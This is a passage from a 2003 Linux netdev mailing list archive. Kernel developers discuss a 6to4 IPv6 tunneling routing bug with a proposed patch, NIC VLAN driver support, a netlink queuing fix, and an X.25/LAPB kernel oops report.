>>> >>>Works: >>> >>>hades:~# ip route add ::/0 via 2002:c058:6301::1 >>> >>>Unfortunately the first form is what I need: >>> >>>hades:~# host -t AAAA 6to4.ipv6.funet.fi >>>6to4.ipv6.funet.fi has AAAA address 2001:708:0:1::624 >>>6to4.ipv6.funet.fi has AAAA address 2002:c058:6301:: >>> >>> >>I think that in this particular case, if should have configured your >>interface address with 2002:v4:addr::/16, of which subnet anycast router >>address would be 2002::. >> >> > >Ah ok. It *is* configured with a /16. As far as my host is concerned, >2002:c058:6301:: should be just a unicast address like any other, so >maybe there is a IID==0 check somewhere? > > > >>>So apparently there really is an inappropriate subnet router anycast >>>sanity check. Please fix this! >>> >>> >>This *may* be caused by another issue too: nexthop's must be given in the >>compatible "::192.88.99.1" format, not 2002:xxxx :-( >> >>I sent a patch on over a year or so ago, but it didn't gain that much >>enthusiasm.. >> >> > >I vote for fixing this too. :-) > > MikaL > >- >To unsubscribe from this list: send the line "unsubscribe linux-kernel" in >the body of a message to majordomo@vger.kernel.org >More majordomo info at http://vger.kernel.org/majordomo-info.html >Please read the FAQ at http://www.tux.org/lkml/ > > > From mika.liljeberg@welho.com Fri Jul 11 06:38:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 06:38:47 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BDca2x017690 for ; Fri, 11 Jul 2003 06:38:37 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6BDcX5n001674; Fri, 11 Jul 2003 16:38:33 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6BDcWwc001673; Fri, 11 Jul 2003 16:38:32 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: Mika =?ISO-8859-1?Q?Penttil=E4?= Cc: Pekka Savola , Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: <3F0EB227.50403@kolumbus.fi> References: <1057925366.896.24.camel@hades> <3F0EB227.50403@kolumbus.fi> Content-Type: text/plain; charset=iso-8859-15 Message-Id: <1057930712.895.32.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 16:38:32 +0300 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6BDca2x017690 X-archive-position: 3957 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Fri, 2003-07-11 at 15:48, Mika Penttilä wrote: > It turns out to be the (otherwise valid) check for IFF_LOOPBACK for > gateway's address in ip6_route_add() that gives EINVAL for prefix::, and > has nothing to do with iid being 0, just a coinsidence.... Not sure. Seems to me that ipv6_addr_type() flags the gateway address as anycast. In ip6_route_addr() [2.5.74] we have: if (rtmsg->rtmsg_flags & RTF_GATEWAY) { struct in6_addr *gw_addr; int gwa_type; gw_addr = &rtmsg->rtmsg_gateway; ipv6_addr_copy(&rt->rt6i_gateway, &rtmsg->rtmsg_gateway); gwa_type = ipv6_addr_type(gw_addr); if (gwa_type != (IPV6_ADDR_LINKLOCAL|IPV6_ADDR_UNICAST)) { struct rt6_info *grt; /* IPv6 strictly inhibits using not link-local addresses as nexthop address. Otherwise, router will not able to send redirects. It is very good, but in some (rare!) curcumstances (SIT, PtP, NBMA NOARP links) it is handy to allow some exceptions. --ANK */ err = -EINVAL; if (!(gwa_type&IPV6_ADDR_UNICAST)) goto out; Looks like it would bail out here, unless I read the code wrong. How about: if (!(gwa_type&(IPV6_ADDR_UNICAST|IPV6_ADDR_ANYCAST))) goto out; MikaL From mika.penttila@kolumbus.fi Fri Jul 11 07:21:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 07:22:04 -0700 (PDT) Received: from notes.hallinto.turkuamk.fi (notes.hallinto.turkuamk.fi [195.148.215.149]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BELn2x019538 for ; Fri, 11 Jul 2003 07:21:50 -0700 Received: from kolumbus.fi ([193.166.244.70]) by marconi.hallinto.turkuamk.fi (Lotus Domino Release 5.0.8) with ESMTP id 2003071117230610:20344 ; Fri, 11 Jul 2003 17:23:06 +0300 Message-ID: <3F0EC96D.6080102@kolumbus.fi> Date: Fri, 11 Jul 2003 17:27:57 +0300 From: =?ISO-8859-15?Q?Mika_Penttil=E4?= User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Mika Liljeberg CC: Pekka Savola , Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked References: <1057925366.896.24.camel@hades> <3F0EB227.50403@kolumbus.fi> <1057930712.895.32.camel@hades> X-MIMETrack: Itemize by SMTP Server on marconi.hallinto.turkuamk.fi/TAMK(Release 5.0.8 |June 18, 2001) at 11.07.2003 17:23:06, Serialize by Router on notes.hallinto.turkuamk.fi/TAMK(Release 5.0.10 |March 22, 2002) at 11.07.2003 17:22:37, Serialize complete at 11.07.2003 17:22:37 Content-Type: text/plain; charset=iso-8859-15; format=flowed Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6BELn2x019538 X-archive-position: 3958 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.penttila@kolumbus.fi Precedence: bulk X-list: netdev afaics, ipv6_addr_type() checks just for some rfc-specified reserved anycast addresses, not the ones in device list. Anyway, it will surely also bail out from the loopback test (anycast subnet router address is ours). --Mika Mika Liljeberg wrote: >On Fri, 2003-07-11 at 15:48, Mika Penttilä wrote: > > >>It turns out to be the (otherwise valid) check for IFF_LOOPBACK for >>gateway's address in ip6_route_add() that gives EINVAL for prefix::, and >>has nothing to do with iid being 0, just a coinsidence.... >> >> > >Not sure. Seems to me that ipv6_addr_type() flags the gateway address as >anycast. In ip6_route_addr() [2.5.74] we have: > > if (rtmsg->rtmsg_flags & RTF_GATEWAY) { > struct in6_addr *gw_addr; > int gwa_type; > > gw_addr = &rtmsg->rtmsg_gateway; > ipv6_addr_copy(&rt->rt6i_gateway, &rtmsg->rtmsg_gateway); > gwa_type = ipv6_addr_type(gw_addr); > > if (gwa_type != (IPV6_ADDR_LINKLOCAL|IPV6_ADDR_UNICAST)) { > struct rt6_info *grt; > > /* IPv6 strictly inhibits using not link-local > addresses as nexthop address. > Otherwise, router will not able to send redirects. > It is very good, but in some (rare!) curcumstances > (SIT, PtP, NBMA NOARP links) it is handy to allow > some exceptions. --ANK > */ > err = -EINVAL; > if (!(gwa_type&IPV6_ADDR_UNICAST)) > goto out; > >Looks like it would bail out here, unless I read the code wrong. How about: > > if (!(gwa_type&(IPV6_ADDR_UNICAST|IPV6_ADDR_ANYCAST))) > goto out; > > MikaL > >- >To unsubscribe from this list: send the line "unsubscribe linux-kernel" in >the body of a message to majordomo@vger.kernel.org >More majordomo info at http://vger.kernel.org/majordomo-info.html >Please read the FAQ at http://www.tux.org/lkml/ > > > From mika.liljeberg@welho.com Fri Jul 11 07:32:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 07:32:52 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BEWd2x019938 for ; Fri, 11 Jul 2003 07:32:40 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6BEWZrD000739; Fri, 11 Jul 2003 17:32:35 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6BEWYmL000738; Fri, 11 Jul 2003 17:32:34 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: Mika =?ISO-8859-1?Q?Penttil=E4?= Cc: Pekka Savola , Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: <3F0EC96D.6080102@kolumbus.fi> References: <1057925366.896.24.camel@hades> <3F0EB227.50403@kolumbus.fi> <1057930712.895.32.camel@hades> <3F0EC96D.6080102@kolumbus.fi> Content-Type: multipart/mixed; boundary="=-DKIDlaIdFwiWn2TE4NdP" Message-Id: <1057933954.695.6.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 17:32:34 +0300 X-archive-position: 3959 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev --=-DKIDlaIdFwiWn2TE4NdP Content-Type: text/plain; charset=iso-8859-15 Content-Transfer-Encoding: quoted-printable On Fri, 2003-07-11 at 17:27, Mika Penttil=E4 wrote: > afaics, ipv6_addr_type() checks just for some rfc-specified reserved=20 > anycast addresses, not the ones in device list. Anyway, it will surely=20 > also bail out from the loopback test (anycast subnet router address is=20 > ours). Nope, since the tunnel interface will have 2002::/16. It seems to work with the attached patch (against 2.4.21-ac4). A small fix to sit was required as well. Look: hades:~# ifconfig 6to4 6to4 Link encap:IPv6-in-IPv4 inet6 addr: ::213.243.180.94/128 Scope:Compat inet6 addr: 2002:d5f3:b45e::1/16 Scope:Global UP RUNNING NOARP MTU:1480 Metric:1 RX packets:4 errors:0 dropped:0 overruns:0 frame:0 TX packets:4 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:416 (416.0 b) TX bytes:496 (496.0 b) hades:~# ip -6 route list ::/96 via :: dev 6to4 metric 256 mtu 1480 advmss 1420 2002::/16 dev 6to4 proto kernel metric 256 mtu 1480 advmss 1420 fe80::/64 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440 fe80::/64 dev 6to4 proto kernel metric 256 mtu 1480 advmss 1420 ff00::/8 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440 ff00::/8 dev 6to4 proto kernel metric 256 mtu 1480 advmss 1420 default via 2002:c058:6301:: dev 6to4 metric 1024 mtu 1480 advmss 1420 hades:~# ping6 -c4 -n www.ipv6.org PING www.ipv6.org(2001:6b0:1:ea:a00:20ff:fe8f:708f) 56 data bytes 64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=3D1 ttl=3D250 time= =3D207 ms 64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=3D2 ttl=3D250 time= =3D206 ms 64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=3D3 ttl=3D250 time= =3D177 ms 64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=3D4 ttl=3D250 time= =3D78.5 ms --- www.ipv6.org ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 3030ms rtt min/avg/max/mdev =3D 78.547/167.637/207.698/52.821 ms Anyone see any problems with this? MikaL --=-DKIDlaIdFwiWn2TE4NdP Content-Disposition: attachment; filename=6to4.udiff Content-Type: text/plain; name=6to4.udiff; charset=iso-8859-15 Content-Transfer-Encoding: quoted-printable --- route.c.org 2003-07-11 16:41:55.000000000 +0300 +++ route.c 2003-07-11 16:42:16.000000000 +0300 @@ -743,7 +743,7 @@ some exceptions. --ANK */ err =3D -EINVAL; - if (!(gwa_type&IPV6_ADDR_UNICAST)) + if (!(gwa_type&(IPV6_ADDR_UNICAST|IPV6_ADDR_ANYCAST))) goto out; =20 grt =3D rt6_lookup(gw_addr, NULL, rtmsg->rtmsg_ifindex, 1); --- sit.c.org 2003-07-11 16:57:53.000000000 +0300 +++ sit.c 2003-07-11 17:17:42.000000000 +0300 @@ -495,10 +495,13 @@ addr_type =3D ipv6_addr_type(addr6); } =20 - if ((addr_type & IPV6_ADDR_COMPATv4) =3D=3D 0) - goto tx_error_icmp; + if ((addr_type & IPV6_ADDR_COMPATv4)) + dst =3D addr6->s6_addr32[3]; + else + dst =3D try_6to4(addr6); =20 - dst =3D addr6->s6_addr32[3]; + if (!dst) + goto tx_error_icmp; } =20 if (ip_route_output(&rt, dst, tiph->saddr, RT_TOS(tos), tunnel->parms.lin= k)) { --=-DKIDlaIdFwiWn2TE4NdP-- From andrius@andrius.org Fri Jul 11 07:59:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 07:59:47 -0700 (PDT) Received: from hl.kalnieciai.lt (postfix@hl.kauneta.net [212.47.103.4]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BExc2x020858 for ; Fri, 11 Jul 2003 07:59:39 -0700 Received: by hl.kalnieciai.lt (Postfix, from userid 1430) id 2FC1A4F187; Fri, 11 Jul 2003 17:59:36 +0300 (GMT-3) Received: from localhost (localhost [127.0.0.1]) by hl.kalnieciai.lt (Postfix) with ESMTP id 2B5714F177; Fri, 11 Jul 2003 17:59:36 +0300 (GMT-3) Date: Fri, 11 Jul 2003 17:59:36 +0300 (GMT-3) From: Andrius Kasparavicius X-X-Sender: andrius@hl.kauneta.net To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? In-Reply-To: <3F0C4DBD.8020007@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3960 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: andrius@andrius.org Precedence: bulk X-list: netdev on vanilla linux kernel, eepro doesn't work, and with 1496 mtu, 8139too works with any mtu (and 1500). which is recommended to use, e100 or eepro100? Andrius. On Wed, 9 Jul 2003, Ben Greear wrote: > > is there any problems to include full vlans support? > > Intel's e100 driver (and all NICs supported by it) support vlans > fine, as do most of the GigE NICs. Tulip does not, last I hear, though > a work-around patch has been around forever. Realtek worked at one time, > not sure about now though... From mika.penttila@kolumbus.fi Fri Jul 11 08:10:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 08:10:10 -0700 (PDT) Received: from notes.hallinto.turkuamk.fi (notes.hallinto.turkuamk.fi [195.148.215.149]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BFA12x024425 for ; Fri, 11 Jul 2003 08:10:02 -0700 Received: from kolumbus.fi ([193.166.244.70]) by marconi.hallinto.turkuamk.fi (Lotus Domino Release 5.0.8) with ESMTP id 2003071118111831:20375 ; Fri, 11 Jul 2003 18:11:18 +0300 Message-ID: <3F0ED4B9.9000105@kolumbus.fi> Date: Fri, 11 Jul 2003 18:16:09 +0300 From: =?ISO-8859-15?Q?Mika_Penttil=E4?= User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Mika Liljeberg CC: Pekka Savola , Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked References: <1057925366.896.24.camel@hades> <3F0EB227.50403@kolumbus.fi> <1057930712.895.32.camel@hades> <3F0EC96D.6080102@kolumbus.fi> <1057933954.695.6.camel@hades> X-MIMETrack: Itemize by SMTP Server on marconi.hallinto.turkuamk.fi/TAMK(Release 5.0.8 |June 18, 2001) at 11.07.2003 18:11:18, Serialize by Router on notes.hallinto.turkuamk.fi/TAMK(Release 5.0.10 |March 22, 2002) at 11.07.2003 18:10:49, Serialize complete at 11.07.2003 18:10:49 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=ISO-8859-15; format=flowed X-archive-position: 3961 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.penttila@kolumbus.fi Precedence: bulk X-list: netdev Mika Liljeberg wrote: >Nope, since the tunnel interface will have 2002::/16. It seems to work >with the attached patch (against 2.4.21-ac4). A small fix to sit was >required as well. Look: > > ok, forgot that...looks ok to me. --Mika >hades:~# ifconfig 6to4 >6to4 Link encap:IPv6-in-IPv4 > inet6 addr: ::213.243.180.94/128 Scope:Compat > inet6 addr: 2002:d5f3:b45e::1/16 Scope:Global > UP RUNNING NOARP MTU:1480 Metric:1 > RX packets:4 errors:0 dropped:0 overruns:0 frame:0 > TX packets:4 errors:0 dropped:0 overruns:0 carrier:0 > collisions:0 txqueuelen:0 > RX bytes:416 (416.0 b) TX bytes:496 (496.0 b) > >hades:~# ip -6 route list >::/96 via :: dev 6to4 metric 256 mtu 1480 advmss 1420 >2002::/16 dev 6to4 proto kernel metric 256 mtu 1480 advmss 1420 >fe80::/64 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440 >fe80::/64 dev 6to4 proto kernel metric 256 mtu 1480 advmss 1420 >ff00::/8 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440 >ff00::/8 dev 6to4 proto kernel metric 256 mtu 1480 advmss 1420 >default via 2002:c058:6301:: dev 6to4 metric 1024 mtu 1480 advmss 1420 >hades:~# ping6 -c4 -n www.ipv6.org >PING www.ipv6.org(2001:6b0:1:ea:a00:20ff:fe8f:708f) 56 data bytes >64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=1 ttl=250 time=207 ms >64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=2 ttl=250 time=206 ms >64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=3 ttl=250 time=177 ms >64 bytes from 2001:6b0:1:ea:a00:20ff:fe8f:708f: icmp_seq=4 ttl=250 time=78.5 ms > >--- www.ipv6.org ping statistics --- >4 packets transmitted, 4 received, 0% packet loss, time 3030ms >rtt min/avg/max/mdev = 78.547/167.637/207.698/52.821 ms > >Anyone see any problems with this? > > MikaL > > > >------------------------------------------------------------------------ > >--- route.c.org 2003-07-11 16:41:55.000000000 +0300 >+++ route.c 2003-07-11 16:42:16.000000000 +0300 >@@ -743,7 +743,7 @@ > some exceptions. --ANK > */ > err = -EINVAL; >- if (!(gwa_type&IPV6_ADDR_UNICAST)) >+ if (!(gwa_type&(IPV6_ADDR_UNICAST|IPV6_ADDR_ANYCAST))) > goto out; > > grt = rt6_lookup(gw_addr, NULL, rtmsg->rtmsg_ifindex, 1); >--- sit.c.org 2003-07-11 16:57:53.000000000 +0300 >+++ sit.c 2003-07-11 17:17:42.000000000 +0300 >@@ -495,10 +495,13 @@ > addr_type = ipv6_addr_type(addr6); > } > >- if ((addr_type & IPV6_ADDR_COMPATv4) == 0) >- goto tx_error_icmp; >+ if ((addr_type & IPV6_ADDR_COMPATv4)) >+ dst = addr6->s6_addr32[3]; >+ else >+ dst = try_6to4(addr6); > >- dst = addr6->s6_addr32[3]; >+ if (!dst) >+ goto tx_error_icmp; > } > > if (ip_route_output(&rt, dst, tiph->saddr, RT_TOS(tos), tunnel->parms.link)) { > > From jmorris@intercode.com.au Fri Jul 11 08:38:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 08:38:16 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:onnveqSIFTPV362efaWpMjYLL15FJ09i@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BFc02x025149 for ; Fri, 11 Jul 2003 08:38:02 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6BFbir06371; Sat, 12 Jul 2003 01:37:45 +1000 Date: Sat, 12 Jul 2003 01:37:44 +1000 (EST) From: James Morris To: Jim Keniston cc: LKML , , Andrew Morton , "David S. Miller" , Jeff Garzik , Alan Cox , Randy Dunlap , Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting In-Reply-To: <3F0DB9A5.23723BE1@us.ibm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3962 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Thu, 10 Jul 2003, Jim Keniston wrote: > James Morris wrote: > > > > On Tue, 8 Jul 2003, Jim Keniston wrote: > > > > + kerror_nl = netlink_kernel_create(NETLINK_KERROR, kerror_netlink_rcv); > > + if (kerror_nl == NULL) > > + panic("kerror_init: cannot initialize kerror_nl\n"); > > > > You can simply use NULL instead of passing the dummy kerror_netlink_rcv > > function. > > That begs the question: do we trust that nobody but the kernel will send > packets to a NETLINK_KERROR socket? Ordinary users can't, but any root > application can. Without kerror_netlink_rcv(), such packets don't get > dequeued. Indeed, the kernel socket buffer fills up. I think this needs to be addressed in the netlink code, per the patch below. Comments? - James -- James Morris diff -NurX dontdiff linux-2.5.75.orig/net/netlink/af_netlink.c linux-2.5.75.w1/net/netlink/af_netlink.c --- linux-2.5.75.orig/net/netlink/af_netlink.c 2003-06-26 12:43:45.000000000 +1000 +++ linux-2.5.75.w1/net/netlink/af_netlink.c 2003-07-12 01:23:49.708254261 +1000 @@ -430,6 +430,10 @@ goto no_dst; nlk = nlk_sk(sk); + /* Don't bother queuing skb if kernel socket has no input function */ + if (nlk->pid == 0 && !nlk->data_ready) + goto no_dst; + #ifdef NL_EMULATE_DEV if (nlk->handler) { skb_orphan(skb); From greearb@candelatech.com Fri Jul 11 10:12:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 10:12:21 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BHCD2x027935 for ; Fri, 11 Jul 2003 10:12:14 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6BHBvKk013306; Fri, 11 Jul 2003 10:11:59 -0700 Message-ID: <3F0EEFDD.8050300@candelatech.com> Date: Fri, 11 Jul 2003 10:11:57 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Andrius Kasparavicius CC: netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3963 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Andrius Kasparavicius wrote: > on vanilla linux kernel, eepro doesn't work, and with 1496 mtu, 8139too > works with any mtu (and 1500). > > which is recommended to use, e100 or eepro100? As I mentioned, the e100 (intel's driver) is the one I recommend. eepro100 does not seem to be updated in the kernel anymore, though if you go figure out how to install Becker's drivers, he may have it working with vlans by now. Ben > > Andrius. > > On Wed, 9 Jul 2003, Ben Greear wrote: > > >>>is there any problems to include full vlans support? >> >>Intel's e100 driver (and all NICs supported by it) support vlans >>fine, as do most of the GigE NICs. Tulip does not, last I hear, though >>a work-around patch has been around forever. Realtek worked at one time, >>not sure about now though... > > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From garzik@gtf.org Fri Jul 11 10:19:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 10:19:12 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BHJ42x028276 for ; Fri, 11 Jul 2003 10:19:07 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id DB0556680; Fri, 11 Jul 2003 13:18:58 -0400 (EDT) Date: Fri, 11 Jul 2003 13:18:58 -0400 From: Jeff Garzik To: Ben Greear Cc: Andrius Kasparavicius , netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? Message-ID: <20030711171858.GI2210@gtf.org> References: <3F0EEFDD.8050300@candelatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0EEFDD.8050300@candelatech.com> User-Agent: Mutt/1.3.28i X-archive-position: 3964 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Fri, Jul 11, 2003 at 10:11:57AM -0700, Ben Greear wrote: > eepro100 does not seem to be updated in the kernel anymore, though if you > go figure > out how to install Becker's drivers, he may have it working with vlans > by now. I won't say for sure, but I'm fairly certain he does. Most of his drivers got a "slightly larger than normal MTU" pass-over a while ago. I objected to the eepro100 patch, because all it did was change one magic number to another, in the configuration data. I had absolutely no basis for evaluation other than "I hope it works", so it was rejected. If someone wants to look at his eepro100 and merge in new changes (vlan or otherwise), that'd be great. His tulip MTU (aka vlan) changes also want pulling into mainline kernel, since his changes are _much_ better than the tulip vlan patch floating around. Jeff From greearb@candelatech.com Fri Jul 11 10:26:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 10:26:11 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BHQ52x028639 for ; Fri, 11 Jul 2003 10:26:06 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6BHPvKk015102; Fri, 11 Jul 2003 10:25:57 -0700 Message-ID: <3F0EF325.9060708@candelatech.com> Date: Fri, 11 Jul 2003 10:25:57 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jeff Garzik CC: Andrius Kasparavicius , netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? References: <3F0EEFDD.8050300@candelatech.com> <20030711171858.GI2210@gtf.org> In-Reply-To: <20030711171858.GI2210@gtf.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3965 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Jeff Garzik wrote: > On Fri, Jul 11, 2003 at 10:11:57AM -0700, Ben Greear wrote: > >>eepro100 does not seem to be updated in the kernel anymore, though if you >>go figure >>out how to install Becker's drivers, he may have it working with vlans >>by now. > > > I won't say for sure, but I'm fairly certain he does. Most of his > drivers got a "slightly larger than normal MTU" pass-over a while ago. > > I objected to the eepro100 patch, because all it did was change one > magic number to another, in the configuration data. I had absolutely no > basis for evaluation other than "I hope it works", so it was rejected. > > If someone wants to look at his eepro100 and merge in new changes (vlan > or otherwise), that'd be great. His tulip MTU (aka vlan) changes also > want pulling into mainline kernel, since his changes are _much_ better > than the tulip vlan patch floating around. It is beyond me to do this merge at this time, but if someone else can do it that would be great. I can also do some testing of the tulip merge, at least..as I have loads of 4-port nics lying around. Ben > > Jeff > > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From khc@pm.waw.pl Fri Jul 11 10:27:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 10:27:45 -0700 (PDT) Received: from hq.pm.waw.pl (hq.pm.waw.pl [195.116.170.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6BHRd2x028824 for ; Fri, 11 Jul 2003 10:27:41 -0700 Received: by hq.pm.waw.pl (Postfix, from userid 10) id C59BC322F; Fri, 11 Jul 2003 19:27:36 +0200 (CEST) Received: by defiant.pm.waw.pl (Postfix, from userid 500) id 918823C7BC; Fri, 11 Jul 2003 19:27:28 +0200 (CEST) To: netdev@oss.sgi.com Subject: 2.5.74 X.25+LAPB still kills the kernel From: Krzysztof Halasa Date: 11 Jul 2003 19:27:28 +0200 Message-ID: Lines: 52 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 3966 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: khc@pm.waw.pl Precedence: bulk X-list: netdev Hi, No need to actually use X.25+LAPB, it's enough to just compile it in. Linux version 2.5.74 (gcc version 3.2.3 20030422 (Red Hat Linux 3.2.3-4)) You do not need Ethernet either, it will oops with just loopback as well. Serial console dump follows (details available on request in case someone need them). gw:/# ip link 1: lo: mtu 16436 qdisc noqueue link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 gw:/# ifconfig lo Link eUnable to handle kernel paging requestncap:Local Loopb at 